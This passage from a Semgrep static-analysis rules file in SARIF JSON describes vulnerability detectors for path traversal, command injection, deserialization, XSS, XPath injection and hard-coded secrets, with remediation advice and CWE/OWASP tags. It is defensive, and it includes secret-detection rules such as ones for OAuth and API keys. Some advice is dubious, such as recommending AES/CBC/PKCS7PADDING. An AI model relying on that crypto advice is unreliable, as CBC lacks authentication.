generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","id":"python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","name":"python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request)\n - [https://github.com/parnurzeal/gorequest](https://github.com/parnurzeal/gorequest)\n","text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","id":"python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","name":"python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","id":"python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","name":"python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html](https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html)\n","text":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","id":"java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","name":"java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User controlled data in a HTML string may result in XSS"},"help":{"markdown":"User controlled data in a HTML string may result in XSS\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.security.raw-html-concat.raw-html-concat)\n - [https://owasp.org/www-community/attacks/xss/](https://owasp.org/www-community/attacks/xss/)\n","text":"User controlled data in a HTML string may result in XSS"},"helpUri":"https://semgrep.dev/r/javascript.browser.security.raw-html-concat.raw-html-concat","id":"javascript.browser.security.raw-html-concat.raw-html-concat","name":"javascript.browser.security.raw-html-concat.raw-html-concat","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.security.raw-html-concat.raw-html-concat"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-json-flask.tainted-json-flask)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/json.html](https://docs.python.org/3/library/json.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-json-flask.tainted-json-flask","id":"python.flask.deserialization.tainted-json-flask.tainted-json-flask","name":"python.flask.deserialization.tainted-json-flask.tainted-json-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-json-flask.tainted-json-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path."},"help":{"markdown":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal)\n - [https://www.owasp.org/index.php/Path_Traversal](https://www.owasp.org/index.php/Path_Traversal)\n","text":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path."},"helpUri":"https://semgrep.dev/r/java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","id":"java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","name":"java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"abi.encodePacked hash collision with variable length arguments in $F()"},"help":{"markdown":"abi.encodePacked hash collision with variable length arguments in $F()\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.encode-packed-collision.encode-packed-collision)\n - [https://swcregistry.io/docs/SWC-133](https://swcregistry.io/docs/SWC-133)\n","text":"abi.encodePacked hash collision with variable length arguments in $F()"},"helpUri":"https://semgrep.dev/r/solidity.security.encode-packed-collision.encode-packed-collision","id":"solidity.security.encode-packed-collision.encode-packed-collision","name":"solidity.security.encode-packed-collision.encode-packed-collision","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.encode-packed-collision.encode-packed-collision"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.audit.cookies.httponly-false.httponly-false)\n - [https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware](https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware)\n - [https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions](https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"helpUri":"https://semgrep.dev/r/csharp.lang.audit.cookies.httponly-false.httponly-false","id":"csharp.lang.audit.cookies.httponly-false.httponly-false","name":"csharp.lang.audit.cookies.httponly-false.httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.audit.cookies.httponly-false.httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks."},"helpUri":"https://semgrep.dev/r/python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","id":"python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","name":"python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","id":"python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","name":"python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument."},"help":{"markdown":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor)\n - [https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/#snakeyaml-deserialization-vulnerability](https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/#snakeyaml-deserialization-vulnerability)\n","text":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument."},"helpUri":"https://semgrep.dev/r/java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","id":"java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","name":"java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","id":"csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","name":"csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","id":"javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","name":"javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"SonarQube Docs API Key detected"},"help":{"markdown":"SonarQube Docs API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"SonarQube Docs API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","id":"generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","name":"generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - 